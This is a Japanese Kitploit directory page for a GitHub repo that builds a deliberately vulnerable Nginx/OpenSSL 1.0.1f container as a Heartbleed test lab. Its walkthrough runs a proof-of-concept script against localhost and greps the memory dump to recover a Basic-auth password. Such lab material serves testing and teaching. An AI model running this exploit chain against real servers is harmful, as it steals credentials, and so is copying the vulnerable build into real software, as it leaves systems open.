Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Heartbleed_Dockerfile_with_Nginx — CVE-2014-0160 Heartbleed の悪用をテストするための Dockerfile | Kitploit
ツール/GitHubGitHub/froyo75/heartbleed_dockerfile_with_nginx
コンテナセキュリティ脆弱性分析エクスプロイトウェブセキュリティペネトレーションテスト学習と教育
GitHubfroyo75/heartbleed_dockerfile_with_nginx

Heartbleed_Dockerfile_with_Nginx

CVE-2014-0160 Heartbleed の悪用をテストするための Dockerfile

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
14年前未レビュー

Nginx Dockerfileを用いたHeartbleedテスト

このリポジトリには、CVE-2014-0160 Heartbleed 脆弱性のテストのための、脆弱な OpenSSL バージョン (1.0.1f) を搭載した Nginx の Dockerfile が含まれています。

ベースDockerイメージ

  • debian:latest

インストール

  1. Docker をインストール

    • Debianの例: apt-get install -y docker
  2. 公開されている Docker Hub Registry からdebianベースイメージをダウンロード: docker pull debian:latest

  3. Dockerfileからイメージをビルド: docker build -t heartbleed_nginx_img .

使用方法

Heartbleed+Nginxコンテナの起動

docker run -i -t -p 1500:443 heartbleed_nginx_img

HTTP Basic認証方式によるHeartbleed脆弱性(CVE-2014-0160)のテスト
  1. Heartbleed-poc Pythonスクリプト をダウンロード(テスト目的のみ!)。これはJared Stafford [email protected] によるオリジナルを修正したものです。 SensePostに感謝します。

  2. 現在のターミナルで2つの新しいタブを開き、以下を実行:

    • 1つ目のタブ(curlコマンドでHTTP Basic認証を使用してx100回のGETリクエストを生成):

      for loop in {0..100..1}; do curl -X GET -s -i -k -u admin:myP@ssword0MG https://127.0.0.1:1500| grep -E "200"; done

      HTTP/1.1 200 OK HTTP/1.1 200 OK HTTP/1.1 200 OK HTTP/1.1 200 OK snipp...

    • 2つ目のタブ(x100回のHeartbeatリクエスト(-n 100) を生成し、メモリダンプを "dump.bin" ファイルに書き込み、メモリダンプから "Authorization" フィールドの結果を取得し、最後に Base64 結果文字列をプレーンテキストにデコード(^^)):

      python heartbleed-poc.py -f dump.bin -q -n 100 -p 1500 127.0.0.1 && grep -a "^Authorization:" dump.bin | head -n1 | awk -F " " '{print $3}' | tr -d '\n\r' | base64 --decode && echo

      WARNING: server 127.0.0.1 returned more data than it should - server is vulnerable! ... received message: type = 22, ver = 0302, length = 66 ... received message: type = 22, ver = 0302, length = 925 ... received message: type = 22, ver = 0302, length = 331 ... received message: type = 22, ver = 0302, length = 4 ... received message: type = 24, ver = 0302, length = 16384 WARNING: server 127.0.0.1 returned more data than it should - server is vulnerable! snipp... admin:myP@ssword0MG

ツールをダウンロード